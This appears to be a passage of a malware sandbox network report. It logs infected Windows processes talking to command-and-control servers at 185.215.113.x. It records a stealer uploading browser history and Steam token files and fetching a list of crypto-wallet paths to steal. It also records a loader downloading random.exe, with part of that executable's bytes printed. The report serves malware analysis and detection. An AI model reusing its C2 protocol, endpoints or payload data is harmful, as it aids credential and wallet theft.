[TRUNCATED] Data Ascii: ------IIIEBAAFBFBAKFIDBAFHContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------IIIEBAAFBFBAKFIDBAFHContent-Disposition: form-data; name="file_name"aGlzdG9yeVxNb3ppbGxhIEZpcmVmb3hfdjZ6Y2hoaHYuZGVmYXVsdC1yZWxlYXNlLnR4dA==------IIIEBAAFBFBAKFIDBAFHContent-Disposition: form-data; name="file"aHR0cHM6Ly9zdXBwb3J0Lm1vemlsbGEub3JnL3Byb2R1Y3RzL2ZpcmVmb3gKaHR0cHM6Ly9zdXBwb3J0Lm1vemlsbGEub3JnL2tiL2N1c3RvbWl6ZS1maXJlZm94LWNvbnRyb2xzLWJ1dHRvbnMtYW5kLXRvb2xiYXJzP3V0bV9zb3VyY2U9ZmlyZWZveC1icm93c2VyJnV0bV9tZWRpdW09ZGVmYXVsdC1ib29rbWFya3MmdXRtX2NhbXBhaWduPWN1c3RvbWl6ZQpodHRwczovL3d3dy5tb3ppbGxhLm9yZy9jb250cmlidXRlLwpodHRwczovL3d3dy5tb3ppbGxhLm9yZy9hYm91dC8KaHR0cHM6Ly93d3cubW96aWxsYS5vcmcvZmlyZWZveC8/dXRtX21lZGl1bT1maXJlZm94LWRlc2t0b3AmdXRtX3NvdXJjZT1ib29rbWFya3MtdG9vbGJhciZ1dG1fY2FtcGFpZ249bmV3LXVzZXJzJnV0bV9jb250ZW50PS1nbG9iYWwKaHR0cHM6Ly93d3cubW96aWxsYS5vcmcvcHJpdmFjeS9maXJlZm94LwpodHRwczovL3d3dy5tb3ppbGxhLm9yZy9lbi1VUy9wc [TRUNCATED]
Nov 4, 2024 17:33:21.971451044 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 4, 2024 17:33:22.131105900 CET	469	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIIECAAKECFHIECBKJD Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 2d 2d 0d 0a Data Ascii: ------HIIIECAAKECFHIECBKJDContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------HIIIECAAKECFHIECBKJDContent-Disposition: form-data; name="message"wallets------HIIIECAAKECFHIECBKJD--
Nov 4, 2024 17:33:22.412575006 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:22 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Nov 4, 2024 17:33:22.415405035 CET	467	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKEHIEBKJKFIEBGDGDAA Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 2d 2d 0d 0a Data Ascii: ------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="message"files------KKEHIEBKJKFIEBGDGDAA--
Nov 4, 2024 17:33:22.696376085 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 4, 2024 17:33:22.757885933 CET	565	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHD Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="file"------BGCAAFHIEBKJKEBFIEHD--
Nov 4, 2024 17:33:23.535940886 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 4, 2024 17:33:23.572628975 CET	474	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBFCGIDAKECGCBGDBAFI Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 2d 2d 0d 0a Data Ascii: ------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="message"ybncbhylepme------FBFCGIDAKECGCBGDBAFI--
Nov 4, 2024 17:33:23.853444099 CET	271	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 68 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	50116	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:05.676929951 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:33:06.565398932 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	50130	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:08.205827951 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:33:09.115931988 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	50137	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:10.834523916 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:33:11.756619930 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	50157	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:13.414829969 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:33:14.317835093 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50166	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:16.600080013 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:33:17.562016010 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50168	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:19.249942064 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:33:20.129348040 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50169	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:21.768667936 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:33:22.668342113 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50170	185.215.113.16	80	2472	C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:23.864291906 CET	80	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Nov 4, 2024 17:33:24.775177002 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:24 GMT Content-Type: application/octet-stream Content-Length: 3321344 Last-Modified: Mon, 04 Nov 2024 16:30:47 GMT Connection: keep-alive ETag: "6728f6b7-32ae00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 c0 32 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf2@2{2@WkT22 @.rsrc@.idata @gdugoicm,+@gyoifhig22@.taggant02"2@
Nov 4, 2024 17:33:24.775193930 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:33:24.775213957 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:33:24.775229931 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:33:24.775242090 CET	1236	IN	Data Raw: a5 a2 f1 ee 9c 33 db 08 d6 07 94 60 d4 1f 8c 3e cc 63 24 e7 e1 e2 25 ef 3c e2 7a 84 c9 89 3a 67 05 a3 f1 ee 9c 53 da 08 d6 07 f4 60 d4 1f 8c de cb 63 24 e7 c1 e2 25 ef 3c e2 7a 84 c9 89 32 67 f5 a3 f1 ee 9c 03 ce 08 d6 07 d4 60 d4 1f 8c fe cb 63 Data Ascii: 3`>c$%<z:gS`c$%<z2g`c$%<zf-{4ac$%<zfQac$a%<z:gta^c$A%<z:g/Ta~c$!%<z~fCcc$
Nov 4, 2024 17:33:24.775253057 CET	1236	IN	Data Raw: 21 de 25 ef 3c e2 7a 84 c9 89 32 67 49 a5 f1 ee 9c 4b db 08 d6 07 b4 67 d4 1f 8c 1e be 63 24 e7 01 de 25 ef 3c e2 7a 84 c9 89 32 67 41 a5 f1 ee 9c cf e1 08 d6 07 94 67 d4 1f 8c 3e bd 63 24 e7 e1 dd 25 ef 3c e2 7a 84 c9 89 2e 67 39 a5 f1 ee 9c d3 Data Ascii: !%<z2gIKgc$%<z2gAg>c$%<z.g9gc$%<z2gmCgc$%<z2ge4hc$%<z:g]hc$a%<z2gth^c$A%<z2g{
Nov 4, 2024 17:33:24.775392056 CET	1236	IN	Data Raw: d6 07 74 6c d4 1f 8c 5e ef 63 24 e7 41 d9 25 ef 3c e2 7a 84 c9 89 e6 66 25 a8 f1 ee 9c 1b ce 08 d6 07 54 6c d4 1f 8c 7e ef 63 24 e7 21 d9 25 ef 3c e2 7a 84 c9 89 f6 66 5d a8 f1 ee 9c ff e1 08 d6 07 b4 6a d4 1f 8c 1e ef 63 24 e7 01 d9 25 ef 3c e2 Data Ascii: tl^c$A%<zf%Tl~c$!%<zf]jc$%<z6gj>c$%<zfSjc$%<z:gkjc$%<zf-4kc$%<zfU_kc$a%<z
Nov 4, 2024 17:33:24.775404930 CET	1236	IN	Data Raw: c9 89 30 67 a1 a4 ec ee ed de 51 ed d5 87 46 fa 50 1f 0c 78 a0 20 24 6e d1 2b 71 84 c9 eb 7a 84 c9 89 3a e7 d9 d1 25 ef 6d cf 1c 0c d6 a8 26 48 15 23 51 50 90 65 24 e7 41 d4 25 ef 52 e3 2e ae c9 87 f6 f9 50 1f 0c 0c a1 20 24 18 93 eb 7a 84 c9 87 Data Ascii: 0gQFPx $n+qz:%m&H#QPe$A%R.P $zP< $.Py $CRP $0grjS`P $n+qhcxosQP $Pn $g/bxoh%bxofeMyQ;e$m
